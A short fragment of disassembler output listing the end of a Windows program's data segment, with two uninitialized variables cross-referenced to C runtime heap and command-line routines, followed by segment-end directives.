; __heap_init+19�w ...
dword_436874 dd ? ; __heap_alloc:loc_401C7D�r ...
dword_436878 dd ? ; __wincmdln:loc_403394�r ...
align 200h
_data ends
end start